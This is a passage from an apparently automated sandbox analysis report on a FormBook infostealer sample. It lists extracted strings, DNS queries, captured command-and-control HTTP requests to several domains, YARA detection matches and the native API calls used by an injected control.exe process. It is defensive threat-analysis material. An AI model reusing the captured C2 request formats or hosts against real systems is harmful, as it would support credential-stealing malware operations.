          Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: control.exe, 00000012.00000002.531021595.0000000004D42000.00000004.00020000.sdmpString found in binary or memory: http://www.iyfubh.com/?dn=eclecticrenaissancewoman.com&pid=9POJB64QD
          Source: ClgNlmU3Is.exe, 00000000.00000003.254086293.0000000005776000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: ClgNlmU3Is.exe, 00000000.00000003.254356959.0000000005779000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/4
          Source: ClgNlmU3Is.exe, 00000000.00000003.254086293.0000000005776000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/?
          Source: ClgNlmU3Is.exe, 00000000.00000003.254086293.0000000005776000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/C
          Source: ClgNlmU3Is.exe, 00000000.00000003.254086293.0000000005776000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/J
          Source: ClgNlmU3Is.exe, 00000000.00000003.253743859.0000000005773000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Q
          Source: ClgNlmU3Is.exe, 00000000.00000003.254086293.0000000005776000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Sue
          Source: ClgNlmU3Is.exe, 00000000.00000003.254356959.0000000005779000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0icg
          Source: ClgNlmU3Is.exe, 00000000.00000003.254086293.0000000005776000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: ClgNlmU3Is.exe, 00000000.00000003.254086293.0000000005776000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Q
          Source: ClgNlmU3Is.exe, 00000000.00000003.254086293.0000000005776000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/X
          Source: ClgNlmU3Is.exe, 00000000.00000003.254356959.0000000005779000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/p
          Source: ClgNlmU3Is.exe, 00000000.00000003.254086293.0000000005776000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/u
          Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: ClgNlmU3Is.exe, 00000000.00000002.266637051.0000000006A72000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownDNS traffic detected: queries for: www.qywyfeo8.xyz
          Source: global trafficHTTP traffic detected: GET /fqiq/?Hb08=6JOAu55Y8Xzp5was3x3zF3lJbu5eEm2HTNz3vpdd7KIK0WEVLfillQ9z+rMr7mc/lcAimk0NkA==&s6=z484 HTTP/1.1Host: www.tablescaperendezvous4two.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?Hb08=tdw/kGifcRQg4xawfHQmMwAAiMBNQnR2khC/NrDNjqaKgTZ0vjz3oBz05sNQvFL8j7TnHhbqsg==&s6=z484 HTTP/1.1Host: www.doggycc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?Hb08=uHvuYmjgw/ClkyRj1Ej7vtyQWzU3HFRSMqPjxcCXctDPT+ZSz8NKmBzsVhzcWgEZit3oXGWMXw==&s6=z484 HTTP/1.1Host: www.hartfulcleaning.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?Hb08=r0/ZbJthoN4UODxp6ktEAad/47kkdxrfw2EOWc1ElJDlJlQ4qxy1M7DmODdfHJyPJG8yEJi/Mg==&s6=z484 HTTP/1.1Host: www.eclecticrenaissancewoman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?Hb08=mnFbYCr8dRmDLyqklk1rPiA6Of2qOAThWl37YLVanslLOc89q6CMhoedr+7sZO9vcU+qRF0rgQ==&s6=z484 HTTP/1.1Host: www.seal-brother.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?Hb08=whGcnAY+p5z1rRe/fmSdvfSEJoFYodGcl+5aIh9wENe/LQ+yrONZ1XbZa9wseLnSfrq3uQOSsg==&s6=z484 HTTP/1.1Host: www.athafood.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?Hb08=LbdaYrSuq7QDvfsS7oVDq2uzukwE8JpfT8hIBAsO2A/TzW5xSQi4YlBQHFWhJAqsjukGZieEfA==&s6=z484 HTTP/1.1Host: www.farmersfirstseed.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: ClgNlmU3Is.exe, 00000000.00000002.262438937.0000000000C99000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.ClgNlmU3Is.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.ClgNlmU3Is.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ClgNlmU3Is.exe.39f3c40.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.ClgNlmU3Is.exe.39a9e20.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.345807116.0000000000EA0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.318011069.000000000E059000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.345863832.0000000000ED0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.263533498.0000000003889000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.521138198.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.345176789.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.299864210.000000000E059000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.525770741.0000000002E10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.524773419.0000000002B10000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 5.2.ClgNlmU3Is.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.ClgNlmU3Is.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.ClgNlmU3Is.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.ClgNlmU3Is.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.ClgNlmU3Is.exe.39f3c40.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.ClgNlmU3Is.exe.39f3c40.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.ClgNlmU3Is.exe.39a9e20.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.ClgNlmU3Is.exe.39a9e20.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.345807116.0000000000EA0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.345807116.0000000000EA0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.318011069.000000000E059000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.318011069.000000000E059000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.345863832.0000000000ED0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.345863832.0000000000ED0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.263533498.0000000003889000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.263533498.0000000003889000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.521138198.00000000004B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.521138198.00000000004B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.345176789.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.345176789.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.299864210.000000000E059000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.299864210.000000000E059000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.525770741.0000000002E10000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.525770741.0000000002E10000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.524773419.0000000002B10000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.524773419.0000000002B10000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: ClgNlmU3Is.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 5.2.ClgNlmU3Is.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.ClgNlmU3Is.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.ClgNlmU3Is.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.ClgNlmU3Is.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.ClgNlmU3Is.exe.39f3c40.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.ClgNlmU3Is.exe.39f3c40.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.ClgNlmU3Is.exe.39a9e20.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.ClgNlmU3Is.exe.39a9e20.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.345807116.0000000000EA0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.345807116.0000000000EA0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.318011069.000000000E059000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.318011069.000000000E059000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.345863832.0000000000ED0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.345863832.0000000000ED0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.263533498.0000000003889000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.263533498.0000000003889000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.521138198.00000000004B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.521138198.00000000004B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.345176789.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.345176789.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.299864210.000000000E059000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.299864210.000000000E059000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.525770741.0000000002E10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.525770741.0000000002E10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.524773419.0000000002B10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.524773419.0000000002B10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exeCode function: 0_2_00C8D0640_2_00C8D064
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exeCode function: 0_2_00C8F2980_2_00C8F298
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exeCode function: 0_2_00C8F2970_2_00C8F297
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exeCode function: 0_2_052570A00_2_052570A0
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exeCode function: 5_2_0040102D5_2_0040102D
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exeCode function: 5_2_0041B8D35_2_0041B8D3
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exeCode function: 5_2_0041B8D65_2_0041B8D6
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exeCode function: 5_2_0041C98B5_2_0041C98B
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exeCode function: 5_2_0041C3435_2_0041C343
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exeCode function: 5_2_00408C8B5_2_00408C8B
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exeCode function: 5_2_00408C905_2_00408C90
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exeCode function: 5_2_00402D8C5_2_00402D8C
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046C841F18_2_046C841F
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_0477100218_2_04771002
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046CB09018_2_046CB090
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_04781D5518_2_04781D55
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046B0D2018_2_046B0D20
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046D412018_2_046D4120
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046BF90018_2_046BF900
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046CD5E018_2_046CD5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046D6E3018_2_046D6E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046EEBB018_2_046EEBB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_02E2C34318_2_02E2C343
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_02E2B8D318_2_02E2B8D3
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_02E2B8D618_2_02E2B8D6
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_02E2C98B18_2_02E2C98B
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_02E12FB018_2_02E12FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_02E18C8B18_2_02E18C8B
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_02E18C9018_2_02E18C90
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_02E12D8C18_2_02E12D8C
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_02E12D9018_2_02E12D90
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 046BB150 appears 32 times
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exeCode function: 5_2_004185F0 NtCreateFile,5_2_004185F0
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exeCode function: 5_2_004186A0 NtReadFile,5_2_004186A0
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exeCode function: 5_2_00418720 NtClose,5_2_00418720
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exeCode function: 5_2_004187D0 NtAllocateVirtualMemory,5_2_004187D0
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exeCode function: 5_2_004185EB NtCreateFile,5_2_004185EB
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exeCode function: 5_2_0041871A NtClose,5_2_0041871A
          Source: C:\Users\user\Desktop\ClgNlmU3Is.exeCode function: 5_2_004187CA NtAllocateVirtualMemory,5_2_004187CA
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F9860 NtQuerySystemInformation,LdrInitializeThunk,18_2_046F9860
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F9840 NtDelayExecution,LdrInitializeThunk,18_2_046F9840
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F9540 NtReadFile,LdrInitializeThunk,18_2_046F9540
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,18_2_046F9910
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F95D0 NtClose,LdrInitializeThunk,18_2_046F95D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F99A0 NtCreateSection,LdrInitializeThunk,18_2_046F99A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F9660 NtAllocateVirtualMemory,LdrInitializeThunk,18_2_046F9660
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F9A50 NtCreateFile,LdrInitializeThunk,18_2_046F9A50
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F9650 NtQueryValueKey,LdrInitializeThunk,18_2_046F9650
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F96E0 NtFreeVirtualMemory,LdrInitializeThunk,18_2_046F96E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F96D0 NtCreateKey,LdrInitializeThunk,18_2_046F96D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F9710 NtQueryInformationToken,LdrInitializeThunk,18_2_046F9710
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F9FE0 NtCreateMutant,LdrInitializeThunk,18_2_046F9FE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F9780 NtMapViewOfSection,LdrInitializeThunk,18_2_046F9780
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046FB040 NtSuspendThread,18_2_046FB040
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F9820 NtEnumerateKey,18_2_046F9820
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F98F0 NtReadVirtualMemory,18_2_046F98F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F98A0 NtWriteVirtualMemory,18_2_046F98A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F9560 NtWriteFile,18_2_046F9560
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F9950 NtQueueApcThread,18_2_046F9950
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F9520 NtWaitForSingleObject,18_2_046F9520
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046FAD30 NtSetContextThread,18_2_046FAD30
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F95F0 NtQueryInformationFile,18_2_046F95F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F99D0 NtCreateProcessEx,18_2_046F99D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F9670 NtQueryInformationProcess,18_2_046F9670
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F9A20 NtResumeThread,18_2_046F9A20
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F9A00 NtProtectVirtualMemory,18_2_046F9A00
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F9A10 NtQuerySection,18_2_046F9A10
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F9610 NtEnumerateValueKey,18_2_046F9610
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F9A80 NtOpenDirectoryObject,18_2_046F9A80
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F9760 NtOpenProcess,18_2_046F9760
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046F9770 NtSetInformationFile,18_2_046F9770
          Source: C:\Windows\SysWOW64\control.exeCode function: 18_2_046FA770 NtOpenThread,18_2_046FA770
